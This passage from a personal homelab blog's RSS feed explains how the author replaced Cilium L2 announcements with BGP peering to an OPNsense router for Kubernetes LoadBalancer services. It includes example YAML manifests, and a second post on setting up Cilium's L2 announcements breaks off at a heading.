      <guid>https://blog.mei-home.net/posts/k8s-migration-2a-cilium-bgp/</guid>
      <description>I decided to switch from Cilium&amp;#39;s L2 announcements to BGP</description>
      <content:encoded><![CDATA[<p>Wherein I talk about migrating from Cilium&rsquo;s L2 announcements for <code>LoadBalancer</code>
services to BGP.</p>
<p>This is an addendum to the <a href="https://blog.mei-home.net/posts/k8s-migration-2-cilium-lb/">third part</a>
of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<h1 id="bgp-instead-of-l2-announcements">BGP instead of L2 announcements?</h1>
<p>In the last post, I described my setup to make <code>LoadBalancer</code> type services
functional in my k8s Homelab with Cilium&rsquo;s <a href="https://docs.cilium.io/en/stable/network/l2-announcements/">L2 Announcements</a>
feature. While working on the next part of my Homelab, introducing Ingress with
Traefik, I ran into the issue that the source IP is not necessarily preserved
during in-cluster routing.</p>
<p>By default, packets which arrive on a node which doesn&rsquo;t have a pod of the
target service are forwarded to a node which has such a pod. During
that forwarding, source NAT is applied to the packet, overwriting the source IP
with the IP of the node where it originally arrived.
This is also described in the <a href="https://kubernetes.io/docs/tutorials/services/source-ip/">Kubernetes docs</a>.</p>
<p>This is true for both, <code>NodePort</code> and <code>LoadBalancer</code> services. I see this as a
problem specifically for Ingress proxies, as it prevents stuff like IP allow lists
and any other IP dependent functionality in the proxy. All packets would look
like they&rsquo;re coming from a cluster node. With Cilium&rsquo;s L2 announcements, they
would all have the source IP of the node which is currently announcing the
service.</p>
<p>This can be fixed with a config option on Kubernetes services, namely
<code>externalTrafficPolicy: Local</code>. This has the effect that packets are not
forwarded to another node if the one they arrive on doesn&rsquo;t have a pod of the
target service. The default mode is <code>Cluster</code>, where packets are forwarded to
other nodes, but with the downside of sNAT.</p>
<p>Now, at some point, while reading into L2 announcements and the <code>externalTrafficPolicy</code>
option, I read that the <code>Local</code> setting doesn&rsquo;t work properly with the ARP based
L2 announcements.
But now, I can&rsquo;t find that anywhere anymore. &#x1f614;</p>
<p>This was my main trigger, but there are a couple of additional downsides
of the L2 announcements feature. First, it produces a lot of load on the
kube-apiserver. I went into a bit of detail
<a href="https://blog.mei-home.net/posts/k8s-migration-2-cilium-lb/#performance">in my previous post</a>.</p>
<p>Then there&rsquo;s the fact that with the L2 announcements feature, there&rsquo;s also no
real load balancing. Due to how ARP works, there can only ever be one node which
announces the service IP, and so only that node will ever receive traffic for
that service.
Combined with what I previously wrote, this also means that if you want to have
a service with preserved source IPs and multiple pods, you&rsquo;re out of luck. With
<code>externalTrafficPolicy: Local</code>, packets will never be forwarded to another node&rsquo;s
pod, regardless of how many there are. The current announcer will have to carry
all of the load, and any other pods on other nodes will only ever be idle.</p>
<p>To be entirely honest, that&rsquo;s not going to be too much of a problem in my
Homelab. I&rsquo;m currently running exactly no jobs with more than one replica.
But hey, who knows? At some point, my writing might really take off and I might
need three instances serving my blog. &#x1f609;</p>
<h1 id="bgp">BGP</h1>
<p>So instead of the ARP based L2 announcements, it&rsquo;s now going to be Cilium&rsquo;s beta
<a href="https://docs.cilium.io/en/stable/network/bgp-control-plane/">BGP control plane</a>
feature.</p>
<p>I really don&rsquo;t know enough about the protocol, so I&rsquo;m not going to annoy you with
my 1 day old half-knowledge here.</p>
<p>Suffice it to say that with BGP, routers can exchange routes, mostly telling
their peers which networks they can reach.</p>
<p>In the Kubernetes <code>LoadBalancer</code> application, Cilium will announce routes to
the individual <code>LoadBalancer</code> service IPs through a group of cluster nodes.
A route announcement could look like this:</p>
<pre tabindex="0"><code>10.86.55.1/32 via 10.86.5.206
</code></pre><p>That would tell the peer that it can reach the service IP <code>10.86.55.1/32</code> via
the Kubernetes host <code>10.86.5.206</code>. Here, the <code>10.86.5.206</code> host is hanging off
of a switch directly connected to my router, so the router already knows how
to reach it. With the above announcement, it now also knows to forward packets
targeted at <code>10.86.55.1</code> to <code>10.86.5.206</code>, where Cilium will then forward it to
a pod of the target service.</p>
<p>One of the advantages over the Layer 2 ARP protocol used by L2 announcements
is that a completely different, non-routable subnet can be used for the service
IPs.</p>
<p>There are two parts to the setup, one is configuring the router and the other is
configuring Cilium.</p>
<p>One thing to decide on before continuing is the <em>Autonomous System Number</em>.
This number is an identifier for autonomous networks. Similar to IPs, there is
a range of ASNs for private usage which will never be handed out to the public
Internet. It is the range <code>64512–65534</code>. For more infos, have a look at the ASN
table in the <a href="https://en.wikipedia.org/wiki/Autonomous_system_(Internet)#ASN_table">Wikipedia</a>.
While you can use different ASNs for the router and Cilium, it is not necessary,
and I will continue with the same ASN, <code>64555</code>, for both.</p>
<h1 id="router-setup">Router setup</h1>
<p>The first step to using BGP is setting it up on the router. I&rsquo;m using OPNsense
here and will describe the setup. If you&rsquo;re using a different router,
you can adapt the instructions.</p>
<h2 id="generic-instructions">Generic instructions</h2>
<p>To setup BGP in the router, you need a piece of software which listens on port
<code>179</code> by default, receiving route announcements from peers and sending route
announcements to them.
OPNsense uses a plugin which installs <a href="https://frrouting.org/">FRRouting</a>,
which can also be used standalone if you are for example running a Linux host
as a router.</p>
<p>Once you&rsquo;ve enabled BGP, you will need to add all the k8s nodes you would like
to participate in BGP as peers to the router. At least in OPNsense, this means
simply adding the node&rsquo;s routable IP and the Cilium ASN as the node&rsquo;s ASN.</p>
<p>One very important point that cost me quite some time: Don&rsquo;t forget to make sure
that the Kubernetes cluster nodes participating in BGP can actually reach port
<code>179/TCP</code> on your router. I spend quite a while trying to figure out why my
router and Cilium won&rsquo;t peer. &#x1f611;</p>
<h2 id="opnsense-configuration">OPNsense configuration</h2>
<p>For OPNsense, the first step is to go to <code>System</code> -&gt; <code>Firmware</code> -&gt; <code>Plugins</code>
and install the <code>os-frr</code> plugin, which is OPNsense&rsquo;s way to install <a href="https://frrouting.org/">FRROuting</a>.
Once that&rsquo;s done, a new top level menu entry called <code>Routing</code> will appear.</p>
<p><strong>Note:</strong> This is not the <code>System</code> -&gt; <code>Routes</code> menu!</p>
<p>Then, enable the general routing functionality, which starts the necessary
daemons:</p>
<figure>
    <img loading="lazy" src="routing-general.png"
         alt="A screenshot of the OPNsense UI for routing. In the menu on the left, the menu item &#39;General&#39; under the top-level entry &#39;Routing&#39; is chosen. In the configs, the &#39;Enable&#39; checkbox is checked. So is the &#39;Enable logging&#39; checkbox."/> <figcaption>
            <p>Screenshot of the Routing -&gt; General UI.</p>
        </figcaption>
</figure>

<p>Hit <code>Save</code> after you&rsquo;ve checked <code>Enable</code>.</p>
<p>Next, go to <code>BGP</code> and also check <code>enable</code>. Under <code>BGP AS Number</code>, enter the ASN
you chose from the private range.
As I don&rsquo;t need OPNsense redistributing any routes, I&rsquo;ve left the <code>Route Redistribution</code>
drop-down at <code>Nothing selected</code>. I&rsquo;ve left the <code>Network</code> field empty for the
same reason.</p>
<figure>
    <img loading="lazy" src="bgp-general.png"
         alt="A screenshot of the OPNsense UI. In the menu on the left, the sub-item &#39;GP&#39; is chosen under &#39;Routing&#39;. The active tab is &#39;General&#39;. The checkboxes labeled &#39;enable&#39; and &#39;Log Neighbour Changes&#39; are checked. The field &#39;BGP AS Number&#39; has the value 64555. The field &#39;Network&#39; is empty, while the drop-down &#39;Route Redistribution&#39; contains the value &#39;Nothing selected&#39;."/> <figcaption>
            <p>My config for the BGP -&gt; General config.</p>
        </figcaption>
</figure>

<p>The next step is adding the neighbors. For each of the Kubernetes hosts which
should announce routes, click on the <code>+</code> in the bottom right corner of the
<code>BGP</code> -&gt; <code>Neighbors</code> tab and enter the following information:</p>
<ul>
<li>A description so you know which host it is. I&rsquo;m just using the hostname</li>
<li>Under <code>Peer-IP</code>, add the IP of the Kubernetes host</li>
<li>Under <code>Remote AS</code>, enter the ASN you chose from the private range</li>
<li>Under <code>Update-Source Interface</code>, set the interface from which the Kubernetes host
is reachable</li>
</ul>
<p>I left all the checkboxes unchecked, and did not set anything in the
<code>Prefix-List</code> or <code>Route-Map</code> fields:</p>
<figure>
    <img loading="lazy" src="bgp-neighbor.png"
         alt="Another screenshot of the OPNsense UI. It is headed &#39;Edit Neighbor&#39;. The &#39;Description&#39; field has the value &#39;My new shiny Raspberry Pi 5&#39;. The &#39;Peer-IP&#39; field is set to &#39;10.86.5.512&#39;, while &#39;Remote AS&#39; is set to &#39;64555&#39;. The &#39;Update-Source Interface&#39; is set to &#39;VLANHomelab&#39;. All checkboxes besides &#39;Enabled&#39; are unchecked. All &#39;Prefix-List&#39; and &#39;Route-Map&#39; drop-downs are set to &#39;None&#39;."/> <figcaption>
            <p>Example entry for a new neighbor.</p>
        </figcaption>
</figure>

<p>Here I&rsquo;ve got a question to my readers: Isn&rsquo;t there a better way than adding
every single Kubernetes worker host as a peer here? It just feels like unnecessary
manual work, but I didn&rsquo;t find any other info on it.</p>
<p>With all of that done, the router config is complete.</p>
<p><strong>As noted above, don&rsquo;t forget to open port <code>179/TCP</code> on your firewall!</strong></p>
<h3 id="addendum-2024-02-04">Addendum 2024-02-04</h3>
<p>I encountered an error later, when I really started using the Cilium LB. I&rsquo;ve
described it in <a href="https://blog.mei-home.net/posts/k8s-migration-2b-asymmetric-routing/">this post</a>.</p>
<p>In short, if you have a situation like this:</p>
<ul>
<li>LoadBalancer service setup as described in this post</li>
<li>Host in the same subnet as your Kubernetes nodes trying to use LoadBalancer service</li>
<li>LoadBalancer IPs assigned with different subnet than those hosts</li>
</ul>
<p>You will end up with asymmetric routing. Your packets from the host accessing
the service will go through OPNsense, as the packets need to be routed. But the
return path of the packets will be direct, as the k8s nodes and the host using
the service are in the same subnet.</p>
<p>You will then need to do the following:</p>
<ol>
<li>Switch the &ldquo;State Type&rdquo; for all rules allowing access from the subnet to
the LoadBalancer IPs to &ldquo;sloppy state&rdquo;, as OPNsense will only ever see one
side of a connection attempt and consequently block the connection</li>
<li>Create an OUTGOING firewall rule which allows the k8s subnet to access the
LoadBalancer IP as well as an INCOMING rule. I&rsquo;m not sure why this works
right now, but it seems to be necessary, at least in my setup.</li>
</ol>
<h1 id="cilium-setup">Cilium Setup</h1>
<p>The documentation for the Cilium BGP feature can be found <a href="https://docs.cilium.io/en/stable/network/bgp-control-plane/">here</a>.</p>
<p>The first step of the setup is enabling the BGP functionality. As I&rsquo;m using
Helm to deploy Cilium, I&rsquo;m adding this option to my <code>values.yaml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">bgpControlPlane</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>Similar to the L2 announcement, the BGP functionality needs something which
hands out IP addresses to the <code>LoadBalancer</code> services. This can be done with
Cilium&rsquo;s <a href="https://docs.cilium.io/en/stable/network/lb-ipam/">Load Balancer IPAM</a>.</p>
<p>As I&rsquo;ve noted above, because BGP in contrast to L2 ARP announces routes, it is
easier to chose a CIDR which does not overlap with the subnet the Kubernetes nodes
are located in. In my case, the <code>CiliumLoadBalancerIPPool</code> looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumLoadBalancerIPPool</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cilium-lb-ipam</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cidrs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">cidr</span>: <span style="color:#e6db74">&#34;10.86.55.0/24&#34;</span>
</span></span></code></pre></div><p>I&rsquo;ve chosen only a single <code>/24</code>, as I don&rsquo;t expect to ever reach 254 LoadBalancer
services. Most of my services will run through my Traefik Ingress instead of being
directly exposed.</p>
<p>The second part of the Cilium config is the BGP peering policy. It sets up the
details of how to peer, what to announce and with whom the peering should happen.</p>
<p>For me, it looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumBGPPeeringPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">worker-node-bgp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/role</span>: <span style="color:#ae81ff">worker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">virtualRouters</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">localASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exportPodCIDR</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceSelector</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">neighbors</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">peerAddress</span>: <span style="color:#e6db74">&#39;10.86.5.254/32&#39;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">peerASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">eBGPMultihopTTL</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">connectRetryTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">holdTimeSeconds</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">keepAliveTimeSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">gracefulRestart</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">restartTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span></code></pre></div><p>A couple of things to note: There can be multiple neighbors that Cilium peers
with. In my case though, I&rsquo;ve only got the one OPNsense router, which is
reachable under <code>10.86.5.254</code> from the Kubernetes nodes. I&rsquo;m using the same ASN
as I used for the router&rsquo;s BGP setup, <code>64555</code>. I didn&rsquo;t see any reason for why
I should have different ASNs.</p>
<p>The <code>nodeSelector</code> ensures that only my worker nodes announce routes.</p>
<p>Important to note is also the <code>serviceSelector</code>. A missing <code>serviceSelector</code> is
notably not an error. It just means that Cilium won&rsquo;t announce any routes
for <code>LoadBalancer</code> services.</p>
<p>If you&rsquo;d like to, you can also have Cilium announce routes to the actual pods,
by setting <code>exportPodCIDR</code> to <code>true</code>.</p>
<h1 id="running-example">Running Example</h1>
<p>With my current k8s Homelab, I have configured my three worker nodes as
neighbors in OPNsense. I&rsquo;ve also got the following service running for my Ingress:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">ingress-k8s.mei-home.net</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#ae81ff">Local</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">nodePort</span>: <span style="color:#ae81ff">31512</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">443</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span></code></pre></div><p>This is a simplified version of the service the Traefik Helm chart automatically
creates for me.
Important here are the <code>type: LoadBalancer</code> and the <code>externalTrafficPolicy: Local</code>
settings.</p>
<p>It currently has the following IP:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n traefik-ingress service
</span></span><span style="display:flex;"><span>NAME              TYPE           CLUSTER-IP     EXTERNAL-IP   PORT<span style="color:#f92672">(</span>S<span style="color:#f92672">)</span>        AGE
</span></span><span style="display:flex;"><span>traefik-ingress   LoadBalancer   10.7.122.207   10.86.55.5    443:31512/TCP  32h
</span></span></code></pre></div><p>And here is the culmination of this entire article:</p>
<figure>
    <img loading="lazy" src="routing-result.png"
         alt="The final OPNsense screenshot. It shows a table with one row. In the &#39;Network&#39; column, it has the value &#39;10.86.55.5/32&#39;. The &#39;Next Hop&#39; col has the value &#39;10.86.5.206&#39;. The &#39;Path&#39; column says &#39;Internal&#39;, with the &#39;Origin&#39; saying &#39;IGP&#39;."/> <figcaption>
            <p>Example routing table</p>
        </figcaption>
</figure>

<p>So there we are. There&rsquo;s only one Traefik pod running for the moment. And it&rsquo;s
running on the node with the IP <code>10.86.5.206</code>. As I said in the beginning,
with <code>externalTrafficPolicy: Local</code>, only the nodes which host pods of a given
service announce routes to themselves. This prevents intra-cluster routing and
preserves the source IP.</p>
<p>I also had a trial with <code>externalTrafficPolicy: Cluster</code>, and in that case all
three of my current cluster nodes announce the service IP to OPNsense.</p>
<p>Finally, another request to my readers: Do you have a favorite book about
networking? I was initially completely lost (and as you see from my explanation
of BGP, still mostly am) reading about BGP and even ARP when I was working on
the L2 announcement. It&rsquo;s the one big glaring hole in my Homelab knowledge.
Took me ages to get started on VLANs as well, for example.</p>
<p>So if you&rsquo;ve got a favorite book about current important networking tech and
protocols, drop me a note <a href="https://social.mei-home.net/@mmeier">on the Fediverse</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 2: Setting up Cilium as the Load Balancer</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-2-cilium-lb/</link>
      <pubDate>Sat, 30 Dec 2023 10:22:34 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-2-cilium-lb/</guid>
      <description>Fun with ARP</description>
      <content:encoded><![CDATA[<p>This is the third part of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>This time, I will be talking about using <a href="https://cilium.io/">Cilium</a> as the load
balancer for my Kubernetes cluster with L2 announcements.</p>
<h1 id="but-why">But Why?</h1>
<p>A couple of days ago, I was working on setting up my Traefik ingress for the
cluster. While doing so, I yet again had to do a couple of things that just felt
weird and hacky. The most prominent of those was using <code>hostPort</code> a lot when
setting up the pod.</p>
<p>In addition, I would also pin the Traefik pod to a specific host and provide
a DNS entry for that host, all hardcoded.</p>
<p>All of this has a couple of downsides. First, if that ingress host running
Traefik is down, so is my entire cluster, at least as seen from the outside.
Furthermore, using <code>hostPort</code> and a fixed host also has a problem with the
<code>RollingUpdate</code> strategy. Because the ports and the host are fixed, Kubernetes
cannot start a fresh pod before the old pod has been killed.</p>
<p>More generally speaking, there&rsquo;s also the fact that most examples and tutorials,
as well as most Helm chart defaults assume that <code>LoadBalancer</code> type services
work.</p>
<h1 id="and-with-what">And with what?</h1>
<p>Initially, I looked at two potential load balancer implementations. These were
<a href="https://kube-vip.io/">kube-vip</a> and <a href="https://metallb.universe.tf/">MetalLB</a>.
I was initially leaning towards kube-vip, if for no other reason than that I
had kube-vip already running on my control plane nodes, providing the VIP for
the k8s API endpoint.</p>
<p>But while researching, I found out that newer versions of Cilium also had
load balancer functionality. Reading through it, it sounded like it had all
the features I wanted. Its biggest advantage is the simple fact that it doesn&rsquo;t
need me to install any additional components into the Kubernetes cluster. It&rsquo;s
just a couple of configuration changes in Cilium, plus two more maninfests.</p>
<h1 id="interlude-migrating-the-cilium-install-to-helm">Interlude: Migrating the Cilium install to Helm</h1>
<p>Before I started, I decided to change my Cilium install approach. Up to now,
I had Cilium installed via the Cilium CLI, as described in their <a href="https://docs.cilium.io/en/stable/gettingstarted/k8s-install-default/">Quick Start Guide</a>.</p>
<p>There is one pretty big downside in this approach in my mind: It&rsquo;s manual
invocations of a tool, with a specific set of parameters. It&rsquo;s also not simple
to put under version control properly. Sure, I could always create a bash script
which contains the entire invocation with the right parameter, but that&rsquo;s
just not too nice.</p>
<p>So instead of having to document somewhere with which command line parameters
I needed to invoke the Cilium CLI, I switched it all over to Helm and Helmfile,
so now it&rsquo;s treated like everything else in the cluster.</p>
<p>The migration was pretty painless, because in the background, the Cilium CLI
already just calls Helm.</p>
<p>So for the migration, I first needed to get the translation of the command line
parameters into the Helm values for my running install. That can be done with
Helm like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>helm get values cilium -n kube-system -o yaml
</span></span></code></pre></div><p>I then put those values into a <code>values.yaml</code> file for use with Helmfile.
The Helmfile config looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">repositories</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cilium</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">url</span>: <span style="color:#ae81ff">https://helm.cilium.io/</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">releases</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cilium</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">cilium/cilium</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">version</span>: <span style="color:#ae81ff">v1.14.5</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./value-files/cilium.yaml</span>
</span></span></code></pre></div><p>The <code>cilium.yaml</code> values file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">encryption</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">wireguard</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ipam</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">mode</span>: <span style="color:#ae81ff">cluster-pool</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">operator</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">clusterPoolIPv4PodCIDRList</span>: <span style="color:#ae81ff">10.8.0.0</span><span style="color:#ae81ff">/16</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">k8sServiceHost</span>: <span style="color:#ae81ff">api.k8s.example.com</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">k8sServicePort</span>: <span style="color:#ae81ff">6443</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kubeProxyReplacement</span>: <span style="color:#ae81ff">strict</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">operator</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">serviceAccounts</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cilium</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cilium</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">operator</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cilium-operator</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">tunnel</span>: <span style="color:#ae81ff">vxlan</span>
</span></span></code></pre></div><p>With this config, there&rsquo;s no redeployment necessary, it is equivalent to
what the Cilium CLI does.</p>
<h1 id="cilium-l2-announcements-setup">Cilium L2 announcements setup</h1>
<p>Cilium (and load balancers in general, it seems) have two modes for announcing
IPs of services. The more complex one is the <a href="https://docs.cilium.io/en/stable/network/bgp-control-plane/">BGP mode</a>.
In this mode, Cilium would announce routes to the exposed services. This needs
an environment where BGP is configured. I decided to skip this approach, as
my network knowledge in general isn&rsquo;t that great. I&rsquo;ve only got a relatively
hazy idea what the BGP protocol even does.</p>
<p>So I settled on the simpler approach, <a href="https://docs.cilium.io/en/latest/network/l2-announcements/">L2 Announcements</a>.
In this approach, all Cilium nodes in the cluster take part in a leader election
for each of the services which should be exposed and receive a virtual IP. The
node which wins the election then answers any ARP requests asking for the MAC
address of the node with the service virtual IP.
The node then regularly renews a lease in Kubernetes to signal to all other
nodes in the cluster that it&rsquo;s still there. If a lease isn&rsquo;t renewed in a certain
time frame, another node takes over the ARP announcements.</p>
<p>One consequence of this approach is the fact that this is not true load balancing.
All traffic for a given service will always arrive at one specific node. From
the documentation, this is different when using the BGP approach, as that approach
does provide true load balancing.
But what the L2 announcements approach does provide is fail over, and this is
all that I really care about for my setup, at least for now.</p>
<h2 id="cilium-config">Cilium config</h2>
<p>The first step in enabling L2 announcements is to enable the Helm option:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">l2announcements</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>Once that was done, I had the problem that nothing seemed to happen at all.
It turns out that the Helm options are written into a <code>ConfigMap</code> in the Cilium
Helm chart, which is then read by the Cilium pods. And the pods are not
restarted automatically. So to get the option to take any effect, I had to
run the following two commands after deploying the updated Helm chart:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl rollout restart -n kube-system deployment cilium-operator
</span></span><span style="display:flex;"><span>kubectl rollout restart daemonset -n kube-system cilium
</span></span></code></pre></div><p>Then the option was active. You can see the active options in the log output
of the <code>cilium-operator</code> and <code>cilium</code> pods if you ever want to check what the
pods are actually running with.</p>
<p>If anybody out there has any idea what I might have done wrong, needing those
manual <code>rollout restart</code> calls, please ping me on <a href="https://social.mei-home.net/@mmeier">Mastodon</a>.</p>
<p>But still, nothing happens just from enabling the option. There are two manifests
which need to be deployed.</p>
<h2 id="load-balancer-ip-pools">Load balancer IP pools</h2>
